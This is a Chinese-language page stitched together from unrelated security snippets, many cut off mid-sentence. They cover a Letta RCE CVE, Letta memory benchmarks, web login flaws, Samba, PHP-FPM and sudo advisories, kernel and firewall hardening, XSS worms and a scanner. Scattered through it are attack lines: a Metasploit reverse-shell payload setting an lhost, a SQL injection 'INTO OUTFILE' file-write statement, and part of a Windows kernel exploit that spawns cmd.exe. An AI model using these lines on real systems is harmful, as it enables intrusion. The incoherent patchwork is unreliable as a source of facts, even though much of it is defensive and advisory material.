漏洞介绍:Letta(原名 MemGPT)是一个开源框架,旨在构建具备长期记忆、上下文管理和高级推理能力的 AI Agent,也支持将这些 Agent 以微服务形式部署为 REST API 服务,可被集成到应用中使用 漏洞出现在 Letta 服务端的 run_tool_from_source 接口中,该接口会直接执行用户提交的 Python 源码,原本应通过本地沙箱机制(local sandbox)来限制危险操作,但实际实现存在缺陷 漏洞影响:该接口是 Letta 中提供“工具执行”能力的开放端点,设计用于在 AI Agent 中运行自定义脚本工具。 全球分布图:漏洞编号:CVE-2025-51482漏洞等级:高危受影响版本:已知影响 Letta 0.7.12 版本漏洞类型:远程代码执行利用流程:漏洞复现:在本地或测试服务器部署 Letta 后,攻击者可直接向 2、尽快升级 Letta 到官方包含漏洞修复的版本,或合并官方补丁自行构建。
随着开源项目的推进,团队成立了名为 Letta 的公司,持续维护 MemGPT 开源框架,并推动其商业化和工程化落地。原来的 MemGPT 也升级成了 Letta。 Letta 表示。 当地时间 8 月 12 日,Letta 发文称,Letta 在 LoCoMo 上仅通过将对话历史存储在文件中(而不是使用专门的记忆或检索工具),就达到了 74.0% 的准确率。 Letta 表示,虽然 Letta 本身没有原生方式导入 LoCoMo 那样的对话历史,但其最近为 Letta 智能体(包括 MemGPT 智能体)增加了文件系统功能。 Letta:能力比工具更重要 Letta 认为,如今的智能体在使用工具方面非常高效,尤其是那些很可能出现在训练数据中的工具,如文件系统操作。 Letta 先推荐了自家的 Letta Memory Benchmark(Letta 排行榜) 提供了同类对比(apples-to-apples),在保持框架(目前仅 Letta)和工具不变的情况下,评估不同模型在记忆管理方面的能力
二、账号可枚举 漏洞描述: 接口对于不同的账号、密码返回的数据不一样,攻击者可以通过回显差异进行用户名的枚举,拿到账户名之后,再进行密码的爆破 ? 3、限制一定时间内IP登录失败次数 三、密码未加密 四、手机验证码可爆破 漏洞描述 对验证码输入错误次数没有做任何限制+验证码的时效性高于爆破时间 修复建议: 1.点击获取手机验证码后产生即时更新强图形验证码 2.限制输入错误次数 3.缩短验证码的有效期 五、短信轰炸 漏洞描述 修复建议: 1.后端对同一手机号在某段时间只能发送一条短信,并且设置发送次数的上限 六、覆盖注册 七、任意用户密码重置 使用
AI应用的架构特性导致SSRF风险高AIAgent进入攻击视野Letta、AgentScope下半年出现攻击2026年可能成为新热点AI算力成为挖矿目标Ray被入侵后89%用于挖矿攻击者看中AI基础设施的 因为它是最稳定的变现方式:低风险:不需要窃取数据,不触发数据泄露告警;高收益:7x24小时挖矿,算力即金钱;可规模化:一套脚本打天下,批量部署;难追踪:加密货币的匿名性提供天然保护。 7-11月看似攻击量较低(月均约12,000次),但每月上万次的成功入侵,意味着每天都有300-400次恶意命令在云上系统被实际执行。 攻击者不需要"上班",脚本7x24小时运行。周二的峰值可能与工作周期有关。周二是工作周的第二天,企业系统活跃度高,新部署的应用和服务较多,暴露面相应增加,为自动化扫描提供了更多目标。 9.4僵尸资产的“定时炸弹”2019年的漏洞仍在造成数万次入侵。大量系统处于“无人认领”状态。安全债务正在累积成系统性风险。9.5攻击的“全自动化”攻击时间分布均匀,7x24小时不间断。
上传漏洞防御原则核心思想确保上传的文件不会被服务器解析成可执行的脚本,进而引发偏离功能设计的意外后果。 2、确保web server版本为最新,防止由于web server漏洞造成的文件意外解析3、部分文件上传攻击会配合本地其他漏洞进行,所以也要保证web服务器减少其他可利用漏洞。 IIS6.0文件解析漏洞升级IIS版本,IIS5.1与7.5均无此漏洞Apache文件解析漏洞不要使用AddHandler , 改用SetHandler , 写好正则 , 就不会有解析问题<FilesMatch >Require all denied</FilesMatch>Nginx文件解析漏洞1.将php.ini文件中的cgi.fix_pathinfo的值设为0。 Tomcat任意文件上传漏洞1、Tomcat任意文件上传漏洞环境较为苛刻,将Tomcat、jdk、php更新。2、避免开启可、通过 PUT 方式创建 JSP 文件的功能。
此次漏洞最早影响到7年前的版本,黑客可以利用漏洞进行远程代码执行。 漏洞编号 CVE-2017-7494 影响版本 Samba 3.5.0到4.6.4/4.5.10/4.4.14的中间版本 漏洞简介 攻击者利用漏洞可以进行远程代码执行,具体执行条件如下: 1. 漏洞影响 Samba漏洞让人联想到前阶段席卷全球的WannaCry漏洞,研究人员怀疑该漏洞同样具有传播特性。 Rapid7的研究人员同样做了统计,他们检测到有110,000台计算机运行着官方不再提供支持的Samba版本,也就是说不会有针对这些版本的补丁。因此,此次Samba漏洞能够造成的影响可想而知。 漏洞修复 最安全的方法还是打补丁或者升级到Samba 4.6.4/4.5.10/4.4.14任意版本。
美国网络安全和基础设施安全局(CISA)在其积极漏洞利用的安全问题列表中新添加了7个漏洞,其中包括来自Microsoft、Linux和Jenkins的漏洞。 所谓的已知被利用漏洞列表是在网络攻击中被积极利用并需要由联邦民事执行局(FCEB)机构修补的漏洞列表。 加上这七个漏洞,该目录现在包含 654 个漏洞,包括联邦机构必须应用相关补丁和安全更新的日期。 下面列出了本周添加的七个新漏洞,CISA 要求在 2022年5月16日之前对所有这些漏洞进行修补。 编号为CVE-2022-29464的WSO2漏洞于2022年4月18日被披露,几天后,一个漏洞利用程序被公开。Rapid7研究人员很快就看到了在攻击中使用公共PoC来部署网络外壳和硬币矿工。 参考来源 https://www.bleepingcomputer.com/news/security/cisa-adds-7-vulnerabilities-to-list-of-bugs-exploited-in-attacks
jsp_shell_reverse_tcp set lhost 192.168.1.191 set lport 9999 exploit -j 1.jpg 2.jpg 3.jpg 4.jpg 5.jpg 6.jpg 7.
作者selph前言窥探Ring0漏洞世界:未初始化堆变量漏洞哪怕是类似原理的都用,在利用方式上也总能带来很多新鲜感,每次都有新的长见识,不断的感叹和震撼实验环境:•虚拟机:Windows 7 x86•物理机 :Windows 10 x64•软件:IDA,Windbg,VS2022漏洞分析老样子,先IDA找到该漏洞的触发函数TriggerUninitializedMemoryPagedPool,分析函数是如何存在漏洞的 ,当输入的值不是魔数,则会掉用指定位置的回调函数,如果是魔数则填充固定的回调函数去调用要如何利用,也跟上次思路一样,想办法控制该内存申请出现的位置,提前在内存里布置shellcode地址,然后再调用该漏洞函数触发漏洞 ,该漏洞是由未初始化和保存回调而导致的,该漏洞的控制码是:0x222033漏洞利用控制分页内存要按照上面的思路去进行利用,这里需要解决的一个问题就是,如何从用户层去控制该分页内存申请的位置之前在池溢出利用那里 "pause"); system("cmd.exe"); return 0;}截图展示参考资料•[1] Windows Kernel Exploitation Tutorial Part 7:
SELECT “123” INTO OUTFILE “c:/123.txt"; 要使用联合查询写文件,不能使用and或者or拼接写文件 http://172.16.11.222/sqli-labs/Less-7/
但近日安全审计公司FireEye发现特殊IOS漏洞,能够在未越狱的设备上监控用户触摸事件。该漏洞可影响IOS 7.0.X以及6.1.X。 通过这一系统漏洞,app能够在后台监控用户的所有输入操作,包括屏幕触摸事件、按下按钮、激活TouchID甚至是所有的键盘输入。而且利用该漏洞并不要求设备越狱。 虽然Apple仍然没有对该漏洞表示任何观点,但在系统设置中关闭应用后台刷新并完全退出可以避免潜在的监控威胁。但这并不能阻止那些伪装成**音乐而需要持续性后台运行的app利用此监控漏洞。 虽然该漏洞并不要求设备越狱,但App Store严格的审核制度仍然能在一定程度上组织恶意程序上架。在此reizhi建议大家谨慎安装各种助手所提供的免越狱正版app。 在不久之前,Apple紧急推出了IOS 7.0.6更新修复SSL漏洞,而现在又被爆出后台监控漏洞。看来在IOS 7.1发布之前Apple还有得忙的。
研究人员在PHP 7中找出有个远程代码执行(RCE)漏洞,该漏洞CVE编号为CVE-2019-11043。攻击者利用该漏洞只需要访问通过精心伪造的URL就可以在服务器上运行命令。 漏洞简介 该漏洞位于PHP-FPM模块的env_path_info函数,漏洞实际上是有个内存下溢破坏漏洞,攻击者利用该漏洞结合其他漏洞利用可以让攻击者在有漏洞的web网站上执行任意代码。 漏洞利用条件 fastcgi_split_path_info directive必须存在,并且含有以 ^开头,以 $结尾的正则表达式。 虽然漏洞利用只在PHP 7+版本上工作,但该漏洞本身存在于之前的版本中。 识别了有漏洞的目标后,攻击者可以在URL中加上'?a='并发送伪造的请求到有漏洞的web服务器。 建议 因为PoC漏洞利用已经在GitHub上公布了,虽然补丁已经发布了,但是黑客可能已经利用该漏洞了。
网址:https://www.letta.ai/blog/ai-agents-stack AI Agents: Introduction (Part-1). 网址: https://medium.com/@vipra_singh/ai-agents-introduction-part-1-fbec7edb857d 由于技术水平有限,理解可能存在偏差,如有疑问 例如,Letta 的 Agent 可以调用 LangChain、CrewAI 和 Composio 的工具,因为它们都遵循相同的模式。因此,针对常见工具的工具提供商生态系统正在不断增长。 而像Letta这样的框架则使用数据库持久化存储状态,便于查询和扩展。 上下文窗口结构:每次调用LLM时,框架会将 Agent 的状态编译到上下文窗口中。 2025 年,随着框架标准化(如 Letta 的数据库驱动模型)与工具生态的完善,AI Agents 将深入更多领域,重塑工作与生活方式。
加固措施 可参考XXL-JOB作者恨铁不成钢的防护建议:XXL JOB 未授权访问致远程命令执行 "漏洞" 声明 5.1 开启身份认证 配置accessToken,开启身份认证,调度中心和执行器的值需保持一致 target/xxl-job-executor-sample-springboot-2.2.0.jar 再次对执行器进行未授权任意代码执行,如果报错The access token is wrong,说明漏洞修复成功 iptables-services -y && service iptables save && systemctl enable iptables 再次对执行器进行未授权任意代码执行,如果没有响应,连接失败,说明漏洞修复成功
CentOS7 Sudo本地提权漏洞修复 ? Sudo本地提权漏洞漏洞概述 最近国外研究团队披露出sudo堆溢出漏洞,漏洞编号:CVE-2021-3156,普通用户可以通过利用此漏洞,在默认配置的 sudo 主机上获取root权限。 它于2011年7月引入(commit:8255ed69),从1.8.2到1.8.31p2的所有旧版本以及从1.9.0到1.9.5p1的所有稳定版本的默认配置均受影响。 2)CentOS 7:升级到 sudo-1.8.23-10.el7_9.1 或更高版本 木有也有不升级的处理方法,但太麻烦,建议直接升级sudo解决 ? (图片可放大查看) CentOS7修复该漏洞的步骤实践 1、yum在线升级sudo yum makecache fast yum search sudo yum install sudo ?
腾讯云安全参考“安全漏洞的危害及影响力、漏洞技术细节披露情况、该漏洞在安全技术社区的讨论热度”等因素,综合评估该漏洞在攻防实战场景的风险。 当漏洞综合评估为风险严重、影响面较广、技术细节已披露,且被安全社区高度关注时,就将该漏洞列入必修安全漏洞候选清单。 腾讯云安全定期发布安全漏洞必修清单,以此指引企业安全运维人员修复漏洞,从而避免重大损失。 以下是2025年7月份必修安全漏洞清单: 一、Microsoft SharePoint 远程代码执行漏洞(CVE-2025-53770) 二、 Redis hyperloglog 命令远程代码执行漏洞( ) 漏洞介绍及修复建议详见后文 一、 Microsoft SharePoint 远程代码执行漏洞 漏洞概述 腾讯云安全近期监测到Microsoft 官方发布了关于SharePoint 的风险公告,漏洞编号
蠕虫利用站点页面的XSS漏洞根据其特定规则进行传播和感染。 值得注意的是,XSS蠕虫只是Web 2.0蠕虫的其中一种,也是最广为人知的一种它利用网站的XSS漏洞进行散播。 Web2.0蠕虫还有其他形式,如CSRF Worm,顾名思义,该类蠕虫是利用网站的CSRF漏洞进行攻击。 蠕虫攻击流程 1、攻击者发现目标网站存在XSS漏洞,并且可以编写XSS蠕虫; 2、利用一个宿主(如博客空间)作为传播源头进行XSS攻击; 3、当其他用户访问被感染的空间时,XSS蠕虫执行以下操作: 判断用户是否登录 test.indexof('d',1)=2 //从前向后定位d 从第二个字符串开始,第一次出现的位置 test.indexof('d',5,2)=6 //从前向后定位d 从第5位开始向后查2位,即查询第5~7位 这次漏洞的成因是因为新浪对参数g完全没有过滤,这次攻击在Chrome、Safari中会被XSS Filter拦截,而IE、Firefox未能幸免。
安全专家在 Red Hat 所有已测试版本和其他发行版本中均存在这些漏洞,属于 Linux 内核中的提权漏洞,可让攻击者轻松获得 root 权限,在 Linux 内核中已存在 15 年。 Linux 内核属于 5.11.4、5.10.21、5.4.103、4.19.179、4.14.224、4.9.260、4.4.260 或以上版本,已修复了这些漏洞。 /archive/kernel/el7/x86_64/RPMS/kernel-ml-5.12.8-1.el7.elrepo.x86_64.rpm 获取http://elrepo.srv.magticom.ge /archive/kernel/el7/x86_64/RPMS/kernel-ml-5.12.8-1.el7.elrepo.x86_64.rpm 警告:/var/tmp/rpm-tmp.F7O8Zj: 7 (Core)' 重启机器,即可升级到最新内核: [root@ecs-Sebnt ~]# uname -r 5.12.8-1.el7.elrepo.x86_64 注意:如果升级失败,可以开机时候选择原内核启动
巡风是一款适用于企业内网的漏洞快速应急、巡航扫描系统,通过搜索功能可清晰的了解内部网络资产分布情况,并且可指定漏洞插件对搜索结果进行快速漏洞检测并输出结果报表。 请使用者遵守《中华人民共和国网络安全法》,勿将巡风用于非授权的测试 其主体分为两部分:网络资产识别引擎,漏洞检测引擎。 2、漏洞检测引擎会根据用户指定的任务规则进行定期或者一次性的漏洞检测,其支持2种插件类型、标示符与脚本,均可通过web控制台进行添加。 github.com/ysrc/xunfeng 安装指南 https://github.com/ysrc/xunfeng/blob/master/docs/install/Linux.md 下面介绍CentOS7下安装部署巡风的具体步骤
文 | 编程随想曲 首发 | 编程随想曲 1. 开启防火墙 service firewalld start 2. 查看3306端口是否开放 firewall-cmd --query-port=3306/tcp 3. 关闭3306端口 firewall-cmd --permanent --remove-port=3306/tcp firewall-cmd --reload 4. 设置特定IP可以访问3306端口 firewall-cmd --permanent --add-